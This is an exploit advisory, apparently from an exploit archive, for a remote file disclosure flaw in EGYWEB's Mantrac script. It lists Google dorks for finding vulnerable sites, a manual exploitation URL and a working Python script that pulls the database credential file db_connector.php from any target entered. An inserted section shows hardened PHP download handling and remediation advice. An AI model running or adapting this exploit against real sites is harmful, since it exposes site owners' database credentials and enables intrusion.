EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (onlymail) : [email protected]
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Special Thankz: 1337day.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software : www.egyweb.com
|~RISK : Medium
|~Google Keyword/Dork : "Created by EGYWEB" | "EGYWEB" inurl:index.php?pg= | inurl:360download.php
|~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R] ALL example sites.
####################INFO################################
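Database passwords can be disclosed: 360download.php passes the request parameter file_name to download() without any validation, so source files that hold the database credentials can be downloaded.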
### Error Line in '360download.php' ##
..
..
$file_name=$_REQUEST['file_name'];
download($file_name);
?>
########################################################
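A hardened form of the two lines above, as an added example that is not part of the original advisory or of EGYWEB's code. The download directory, the extension allowlist and the helper name resolve_download() are assumptions, and because the body of download() is not shown on the page the file is served here with readfile().

```php
<?php
// Added example: hardened request handling for 360download.php.
// DOWNLOAD_ROOT and ALLOWED_EXT are assumptions; the page does not say where
// legitimate downloads live or which file types the site serves.
const DOWNLOAD_ROOT = '/var/www/site/downloads';
const ALLOWED_EXT   = ['pdf', 'zip', 'jpg', 'png'];

/**
 * Map a user-supplied name to a real file inside DOWNLOAD_ROOT,
 * or return null when the request must be refused.
 */
function resolve_download($requested)
{
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $root = realpath(DOWNLOAD_ROOT);
    if ($root === false) {
        return null; // misconfigured download directory: fail closed
    }
    // realpath() collapses "../" and symlinks; false means the file does not exist.
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit under the download root.
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    // Never serve source files such as classes/db_connector.php.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $path : null;
}

$path = resolve_download($_REQUEST['file_name'] ?? null);
if ($path === null) {
    http_response_code(404); // same answer for "missing" and "forbidden"
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

Keeping the download directory outside the application's source tree, and rotating the database credentials on any site that ran the original handler, closes the remaining exposure.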
Example and tested on;
############################################################
Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE]
############################################################
=========Automatic "db_connector.php" File Disclosure Exploit ========
##################### exploit.py in ##############################
import urllib

def master():
    print """
########################################################
EGYWEB <= Remote File Disclosure Vulnerability (.py)
Automatic "db_connector.php" File Disclosure Exploit
Researched by KnocKout
Exploit Coded by B3mB4m
Website: http://h4x0resec.blogspot.com / h4x0re Security
============
How to use :
python exploit.py
Target : http://VICTIM.com
Target : http://VICTIM.com/path
That's it ! Happy END !
#################################################
"""

class KnocKout:
    def __init__(self):
        self.ask = raw_input("Target : ")

    def exploit(self):
        self.rename = self.ask.replace("http://", "") + ".php"
        try:
            urllib.urlretrieve(self.ask+"/360download.php?file_name=classes/db_connector.php", self.rename)
            print "Finish ! Config --> %s " % (self.rename)
        except:
            print "This website have a security sorry ! ";

if __name__ == '__main__':
    master()
    op = KnocKout()
    op.exploit()
# 0day.today [2018-01-04] #